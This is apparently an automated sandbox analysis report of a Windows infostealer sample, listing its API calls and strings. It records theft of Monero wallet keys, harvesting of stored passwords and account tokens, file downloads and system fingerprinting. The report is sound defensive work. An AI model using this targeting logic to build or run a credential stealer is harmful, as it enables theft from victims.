                                      • Part of subcall function 00FE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FE4EEE,00000000,00000000), ref: 00FE9AEF
                                      • Part of subcall function 00FE9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00FE4EEE,00000000,?), ref: 00FE9B01
                                      • Part of subcall function 00FE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FE4EEE,00000000,00000000), ref: 00FE9B2A
                                      • Part of subcall function 00FE9AC0: LocalFree.KERNEL32(?,?,?,?,00FE4EEE,00000000,?), ref: 00FE9B3F
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FF44A3
                                    • StrCmpCA.SHLWAPI(?,010008D1), ref: 00FF44C0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00FF44D2
                                    • lstrcat.KERNEL32(00000000,?), ref: 00FF44E5
                                    • lstrcat.KERNEL32(00000000,01000FB8), ref: 00FF44F4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                     • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                    • String ID:
                                    • API String ID: 3541710228-0
                                    • Opcode ID: 086bdefe038c5ba7b995b98ec972c6633593c366d8384dd14fd8a91dce6a93cd
                                    • Instruction ID: b9b7354e6d68dd9a7bf11ca0afffcad52839e42a98b206a14d125b288a42966d
                                    • Opcode Fuzzy Hash: 086bdefe038c5ba7b995b98ec972c6633593c366d8384dd14fd8a91dce6a93cd
                                    • Instruction Fuzzy Hash: 687145B6900208B7DB24EFA0DC89FEE7379BF48700F044598F60597585EA78EB45DBA1
                                    APIs
                                      • Part of subcall function 00FE12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FE12B4
                                      • Part of subcall function 00FE12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00FE12BB
                                      • Part of subcall function 00FE12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00FE12D7
                                      • Part of subcall function 00FE12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00FE12F5
                                      • Part of subcall function 00FE12A0: RegCloseKey.ADVAPI32(?), ref: 00FE12FF
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FE134F
                                    • lstrlen.KERNEL32(?), ref: 00FE135C
                                    • lstrcat.KERNEL32(?,.keys), ref: 00FE1377
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                      • Part of subcall function 00FFA9B0: lstrlen.KERNEL32(?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FFA9C5
                                      • Part of subcall function 00FFA9B0: lstrcpy.KERNEL32(00000000), ref: 00FFAA04
                                      • Part of subcall function 00FFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FFAA12
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                      • Part of subcall function 00FF8B60: GetSystemTime.KERNEL32(01000E1A,0180A988,010005AE,?,?,00FE13F9,?,0000001A,01000E1A,00000000,?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FF8B86
                                      • Part of subcall function 00FFA920: lstrcpy.KERNEL32(00000000,?), ref: 00FFA972
                                      • Part of subcall function 00FFA920: lstrcat.KERNEL32(00000000), ref: 00FFA982
                                    • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00FE1465
                                      • Part of subcall function 00FFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FFA7E6
                                      • Part of subcall function 00FE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FE99EC
                                      • Part of subcall function 00FE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FE9A11
                                      • Part of subcall function 00FE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FE9A31
                                      • Part of subcall function 00FE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FE148F,00000000), ref: 00FE9A5A
                                      • Part of subcall function 00FE99C0: LocalFree.KERNEL32(00FE148F), ref: 00FE9A90
                                      • Part of subcall function 00FE99C0: CloseHandle.KERNEL32(000000FF), ref: 00FE9A9A
                                    • DeleteFileA.KERNEL32(00000000), ref: 00FE14EF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                     • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                    • API String ID: 3478931302-218353709
                                    • Opcode ID: 619cb3a88f66837dfbf899c861b3d6b345ef62e1730e349b61d824040972b4c9
                                    • Instruction ID: ae31ef0cfe6f5f779eda1672055e14a377c5ebb211430e2c8eb83aef330bf681
                                    • Opcode Fuzzy Hash: 619cb3a88f66837dfbf899c861b3d6b345ef62e1730e349b61d824040972b4c9
                                    • Instruction Fuzzy Hash: 96512FB195011D97CB25FB60DC96AFD733CAF54300F4041A8B70EA6091EE786B89DBA6
                                    APIs
                                      • Part of subcall function 00FE72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00FE733A
                                      • Part of subcall function 00FE72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00FE73B1
                                      • Part of subcall function 00FE72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00FE740D
                                      • Part of subcall function 00FE72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00FE7452
                                      • Part of subcall function 00FE72D0: HeapFree.KERNEL32(00000000), ref: 00FE7459
                                    • lstrcat.KERNEL32(00000000,010017FC), ref: 00FE7606
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00FE7648
                                    • lstrcat.KERNEL32(00000000, : ), ref: 00FE765A
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00FE768F
                                    • lstrcat.KERNEL32(00000000,01001804), ref: 00FE76A0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00FE76D3
                                    • lstrcat.KERNEL32(00000000,01001808), ref: 00FE76ED
                                    • task.LIBCPMTD ref: 00FE76FB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                    • String ID: :
                                    • API String ID: 2677904052-3653984579
                                    • Opcode ID: b1ab45c81dd23d8a275d60dcbdcf7d5fce86665ee3edbda46499452ab01447ea
                                    • Instruction ID: 89311b3ffb5288bf11488202b1b80be50a99e18e92aefa57e6e8db9b0c41f576
                                    • Opcode Fuzzy Hash: b1ab45c81dd23d8a275d60dcbdcf7d5fce86665ee3edbda46499452ab01447ea
                                    • Instruction Fuzzy Hash: B9315E76900249EFCB25FFA5EC89DFE7374BB44301B104118F106A7A84DB78AA46DB51
                                    APIs
                                      • Part of subcall function 00FFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FFA7E6
                                      • Part of subcall function 00FE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FE4839
                                      • Part of subcall function 00FE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00FE4849
                                    • InternetOpenA.WININET(01000DF7,00000001,00000000,00000000,00000000), ref: 00FE610F
                                    • StrCmpCA.SHLWAPI(?,0180EB30), ref: 00FE6147
                                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00FE618F
                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00FE61B3
                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 00FE61DC
                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00FE620A
                                    • CloseHandle.KERNEL32(?,?,00000400), ref: 00FE6249
                                    • InternetCloseHandle.WININET(?), ref: 00FE6253
                                    • InternetCloseHandle.WININET(00000000), ref: 00FE6260
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2507841554-0
                                    • Opcode ID: f2b7e28d7dfa261719708fa5ad625c2bd80b0003eaeb3e5bb69e8f910b128ead
                                    • Instruction ID: d7b5ba287e879cc52f8f01c0386d4b13c44aee6107195caa2fab9badea9f9c77
                                    • Opcode Fuzzy Hash: f2b7e28d7dfa261719708fa5ad625c2bd80b0003eaeb3e5bb69e8f910b128ead
                                    • Instruction Fuzzy Hash: 13517DB190020CABDF24DF51DC49BEE77B8EB44741F108098E70AA71C4DBB86A89DF95
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00FE733A
                                    • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00FE73B1
                                    • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00FE740D
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00FE7452
                                    • HeapFree.KERNEL32(00000000), ref: 00FE7459
                                    • task.LIBCPMTD ref: 00FE7555
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$EnumFreeOpenProcessValuetask
                                    • String ID: Password
                                    • API String ID: 775622407-3434357891
                                    • Opcode ID: 00365c56848ee4e237e8311cf0402f9bb49fe92cbd8cc2efe32e78462731b1ea
                                    • Instruction ID: f79159f6969b07af36222b7f980870cf97ae1d50980926492aa281b64643b90c
                                    • Opcode Fuzzy Hash: 00365c56848ee4e237e8311cf0402f9bb49fe92cbd8cc2efe32e78462731b1ea
                                    • Instruction Fuzzy Hash: F6614CB1C042989BDB24EF51DC45BD9B7B8BF44340F0081E9E689A6185EBB45FC9DFA0
                                    APIs
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                      • Part of subcall function 00FFA9B0: lstrlen.KERNEL32(?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FFA9C5
                                      • Part of subcall function 00FFA9B0: lstrcpy.KERNEL32(00000000), ref: 00FFAA04
                                      • Part of subcall function 00FFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FFAA12
                                      • Part of subcall function 00FFA920: lstrcpy.KERNEL32(00000000,?), ref: 00FFA972
                                      • Part of subcall function 00FFA920: lstrcat.KERNEL32(00000000), ref: 00FFA982
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                      • Part of subcall function 00FFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FFA7E6
                                    • lstrlen.KERNEL32(00000000), ref: 00FEBC9F
                                      • Part of subcall function 00FF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00FF8E52
                                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 00FEBCCD
                                    • lstrlen.KERNEL32(00000000), ref: 00FEBDA5
                                    • lstrlen.KERNEL32(00000000), ref: 00FEBDB9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                    • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                    • API String ID: 3073930149-1079375795
                                    • Opcode ID: 18b0736d71222401d1e22b11036e84caca438368c9555d8709a793915e172a09
                                    • Instruction ID: 9d47257170d64ef1fa4f3643b730c14005e5531f4c8fa621c69c3dcb1fd79044
                                    • Opcode Fuzzy Hash: 18b0736d71222401d1e22b11036e84caca438368c9555d8709a793915e172a09
                                    • Instruction Fuzzy Hash: D6B168B191010CABDF14FBA0DC56DFE7338AF54300F404168F60AA75A5EF786A59DB62
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess$DefaultLangUser
                                    • String ID: *
                                    • API String ID: 1494266314-163128923
                                    • Opcode ID: 214fb27a55fd2785a03208f59452490b1a7a6884bb43f803fff230defa7bc627
                                    • Instruction ID: 11ce890cd2a8377642af081239922d11ffe6fa6c71383227000600081622286e
                                    • Opcode Fuzzy Hash: 214fb27a55fd2785a03208f59452490b1a7a6884bb43f803fff230defa7bc627
                                    • Instruction Fuzzy Hash: CCF03A31904209FFD368AFE0B50D72CBB70FB14702F040198E60AC7A84EE704A419B99
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00FE4FCA
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FE4FD1
                                    • InternetOpenA.WININET(01000DDF,00000000,00000000,00000000,00000000), ref: 00FE4FEA
                                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00FE5011
                                    • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00FE5041
                                    • InternetCloseHandle.WININET(?), ref: 00FE50B9
                                    • InternetCloseHandle.WININET(?), ref: 00FE50C6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                    • String ID:
                                    • API String ID: 3066467675-0
                                    • Opcode ID: c7ee6c432dbb64ac3b2e5369dbeb74bef794f3467864109fa7ac29cf05db5bdf
                                    • Instruction ID: b8f1d51e80fdb281ca33822c261a70ba19d001b78d1b8149f83c3bb5092d90e4
                                    • Opcode Fuzzy Hash: c7ee6c432dbb64ac3b2e5369dbeb74bef794f3467864109fa7ac29cf05db5bdf
                                    • Instruction Fuzzy Hash: C03119B5A00218ABDB24CF54DC89BDCB7B5EB48704F1081D9F709A7285C7746EC59F98
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0180E020,00000000,?,01000E2C,00000000,?,00000000), ref: 00FF8130
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FF8137
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00FF8158
                                    • wsprintfA.USER32 ref: 00FF81AC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                    • String ID: %d MB$@
                                    • API String ID: 2922868504-3474575989
                                    • Opcode ID: 7333617f2395d369f3e1f7faa4066222b810ec624a85779f35fe44a844cac506
                                    • Instruction ID: 5726e17aa5d3d2c6d26bd810a39b69014facae9be155101b99697c3b052f215c
                                    • Opcode Fuzzy Hash: 7333617f2395d369f3e1f7faa4066222b810ec624a85779f35fe44a844cac506
                                    • Instruction Fuzzy Hash: 852129B1E4420CABDB10DFD4DC49FBEB7B9EB44B50F104209F705AB684D7B859018BA5
                                    APIs
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00FF8426
                                    • wsprintfA.USER32 ref: 00FF8459
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00FF847B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00FF848C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00FF8499
                                      • Part of subcall function 00FFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FFA7E6
                                    • RegQueryValueExA.ADVAPI32(00000000,0180E2A8,00000000,000F003F,?,00000400), ref: 00FF84EC
                                    • lstrlen.KERNEL32(?), ref: 00FF8501
                                    • RegQueryValueExA.ADVAPI32(00000000,0180E1B8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,01000B34), ref: 00FF8599
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00FF8608
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00FF861A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 3896182533-4073750446
                                    • Opcode ID: 5d81295aa7669f84945aefbaec49bf892a3e65666dc4c7b1e4cec5708898f324
                                    • Instruction ID: 79ab8bb0c998e454b91fa902f66aa98de415e13a377e17ba4d4a752194f528ef
                                    • Opcode Fuzzy Hash: 5d81295aa7669f84945aefbaec49bf892a3e65666dc4c7b1e4cec5708898f324
                                    • Instruction Fuzzy Hash: 6321F6B190021CABDB24DF54DC85FE9B7B8FF48700F00C598E609A6580DF716A86CF94
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FF76A4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FF76AB
                                    • RegOpenKeyExA.ADVAPI32(80000002,017FB770,00000000,00020119,00000000), ref: 00FF76DD
                                    • RegQueryValueExA.ADVAPI32(00000000,0180E248,00000000,00000000,?,000000FF), ref: 00FF76FE
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00FF7708
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                     • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: Windows 11
                                    • API String ID: 3225020163-2517555085
                                    • Opcode ID: 77f0e92c124304b0e2ed7d4bd4ac6962e086d1440154d1b1d0b6b639cc4300a4
                                    • Instruction ID: 31ceef6e9632ac8e7771b98941c11ace17062e667bc47a785d3bd485bf0806ee
                                    • Opcode Fuzzy Hash: 77f0e92c124304b0e2ed7d4bd4ac6962e086d1440154d1b1d0b6b639cc4300a4
                                    • Instruction Fuzzy Hash: 5E012CB5A04309BBE720EFA4EC4DF6DB7B8EB48701F104454FB05D7A84D6B499009B51
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FF7734
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FF773B
                                    • RegOpenKeyExA.ADVAPI32(80000002,017FB770,00000000,00020119,00FF76B9), ref: 00FF775B
                                    • RegQueryValueExA.ADVAPI32(00FF76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00FF777A
                                    • RegCloseKey.ADVAPI32(00FF76B9), ref: 00FF7784
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                     • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: CurrentBuildNumber
                                    • API String ID: 3225020163-1022791448
                                    • Opcode ID: 8aab2bfe95dd3669a12a83651bb2458415d023a671cfb6f195124ac11e40d2be
                                    • Instruction ID: d87cf7525bce74b6b09e64b1818202d92b21c3092e7638adc57f2275e20639a2
                                    • Opcode Fuzzy Hash: 8aab2bfe95dd3669a12a83651bb2458415d023a671cfb6f195124ac11e40d2be
                                    • Instruction Fuzzy Hash: D80144B5A40308BBDB20DFE0EC4DFAEB7B8EB48700F104558FA05A7685D6B05900CB51
                                    APIs
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FE99EC
                                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FE9A11
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00FE9A31
                                    • ReadFile.KERNEL32(000000FF,?,00000000,00FE148F,00000000), ref: 00FE9A5A
                                    • LocalFree.KERNEL32(00FE148F), ref: 00FE9A90
                                    • CloseHandle.KERNEL32(000000FF), ref: 00FE9A9A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                     • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
